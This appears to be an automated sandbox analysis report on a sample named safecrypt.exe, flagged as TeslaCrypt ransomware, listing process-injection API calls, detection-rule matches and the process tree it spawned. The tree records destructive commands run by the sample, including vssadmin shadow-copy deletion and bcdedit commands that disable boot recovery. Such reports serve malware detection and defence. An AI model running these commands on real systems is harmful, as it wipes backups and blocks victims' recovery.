            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681B45 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681B45
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681946 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681946
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681B29 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681B29
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_0268193F CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_0268193F
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_0268191A CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_0268191A
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_026819ED CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_026819ED
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_026819F4 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_026819F4
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_026819C8 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_026819C8
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_026819AD CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_026819AD
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681B8C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681B8C
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681983 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681983
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681B85 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681B85
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681991 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681991
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91828 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91828
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91B1B CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91B1B
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91ADB CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91ADB
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D918D5 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D918D5
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D918FF CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D918FF
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91AF1 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91AF1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D918E3 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D918E3
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91899 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91899
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91A93 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91A93
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91892 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91892
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91A8C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91A8C
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91AB1 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91AB1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D916A6 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D916A6
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91C5C NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91C5C
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91852 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91852
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91A4C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91A4C
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D9186D VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D9186D
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91C63 NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91C63
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91A67 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91A67
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91C1C NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91C1C
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91A0A CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91A0A
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91C00 NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91C00
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91A30 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91A30
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91C37 NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91C37
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91836 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91836
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91A22 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91A22
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D919C8 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D919C8
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D919F4 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D919F4
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D919ED CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D919ED
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91991 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91991
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91B8C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91B8C
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91983 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91983
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91B85 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91B85
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D919AD CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D919AD
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91B45 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91B45
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91946 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91946
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91B60 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91B60
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91963 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91963
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D9191A CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D9191A
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D9193F CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D9193F
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: 2_2_00D91B29 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 2_2_00D91B29
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: String function: 0042CC76 appears 50 times
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Code function: String function: 00428D80 appears 76 times
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: String function: 0042CC76 appears 36 times
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: String function: 00428D80 appears 54 times
            Source: safecrypt.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: safecrypt.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: safecrypt.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: mllvvvh.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: mllvvvh.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: mllvvvh.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: safecrypt.exe, 00000000.00000002.326165190.0000000002670000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameMFC42.DLL.MUIR vs safecrypt.exe
            Source: safecrypt.exe, 00000000.00000003.323351259.0000000002980000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAintl.EXE@ vs safecrypt.exe
            Source: safecrypt.exe, 00000001.00000000.324184391.000000000086F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAintl.EXE@ vs safecrypt.exe
            Source: safecrypt.exe, 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameTODO: <Original filename>J vs safecrypt.exe
            Source: safecrypt.exe, 00000001.00000002.329206253.0000000000890000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs safecrypt.exe
            Source: safecrypt.exe, 00000001.00000002.330081586.0000000002B00000.00000002.00000001.sdmp Binary or memory string: originalfilename vs safecrypt.exe
            Source: safecrypt.exe, 00000001.00000002.330081586.0000000002B00000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs safecrypt.exe
            Source: safecrypt.exe, 00000001.00000002.329921338.0000000002A00000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs safecrypt.exe
            Source: safecrypt.exe Binary or memory string: OriginalFilenameAintl.EXE@ vs safecrypt.exe
            Source: safecrypt.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: 00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000019.00000001.389132336.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000014.00000002.360977182.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000017.00000001.371854756.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000017.00000002.373053534.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000014.00000001.355902917.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 4.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.safecrypt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.1.safecrypt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 23.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.safecrypt.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 20.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 20.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 25.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 25.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 25.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 23.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 20.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 20.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 23.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 4.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 23.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 25.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.1.safecrypt.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: safecrypt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: mllvvvh.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.rans.evad.winEXE@37/1004@6/3
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004204D0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,FindCloseChangeNotification,1_2_004204D0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_004204D0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,FindCloseChangeNotification,1_1_004204D0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_004204D0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,FindCloseChangeNotification,4_1_004204D0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_004204D0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,FindCloseChangeNotification,20_2_004204D0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_004204D0 AdjustTokenPrivileges,FindCloseChangeNotification,20_1_004204D0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0041CBF0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,FindCloseChangeNotification,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,4_1_0041CBF0
            Source: C:\Users\user\Desktop\safecrypt.exeFile created: C:\Users\user\AppData\Roaming\mllvvvh.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeMutant created: \Sessions\1\BaseNamedObjects\__sys_234238233295
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4704:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:120:WilError_01
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Temp\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: Shell32.dll1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: KERNEL321_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: \recover_file_1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: .txt1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: %s%s%S%d1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: .HTM1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: Shell32.dll1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: KERNEL321_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: \recover_file_1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: .txt1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: %s%s%S%d1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: .HTM1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: Shell32.dll4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: KERNEL324_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: \recover_file_4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: .txt4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: %s%s%S%d4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: open4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: .HTM4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: open4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: open4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: Shell32.dll20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: KERNEL3220_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: \recover_file_20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: .txt20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: %s%s%S%d20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: open20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: .HTM20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: open20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: open20_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: safecrypt.exeVirustotal: Detection: 91%
            Source: safecrypt.exeMetadefender: Detection: 73%
            Source: safecrypt.exeReversingLabs: Detection: 96%
            Source: C:\Users\user\Desktop\safecrypt.exeFile read: C:\Users\user\Desktop\safecrypt.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\safecrypt.exe 'C:\Users\user\Desktop\safecrypt.exe'
            Source: C:\Users\user\Desktop\safecrypt.exeProcess created: C:\Users\user\Desktop\safecrypt.exe 'C:\Users\user\Desktop\safecrypt.exe'
            Source: C:\Users\user\Desktop\safecrypt.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe C:\Users\user\AppData\Roaming\mllvvvh.exe
            Source: C:\Users\user\Desktop\safecrypt.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c DEL C:\Users\user\Desktop\SAFECR~1.EXE
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe C:\Users\user\AppData\Roaming\mllvvvh.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootems off
            Source: C:\Windows\System32\bcdedit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\vssadmin.exe 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet
            Source: C:\Windows\System32\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} advancedoptions off
            Source: C:\Windows\System32\bcdedit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} optionsedit off
            Source: C:\Windows\System32\bcdedit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
            Source: C:\Windows\System32\bcdedit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} recoveryenabled off
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Windows\System32\bcdedit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
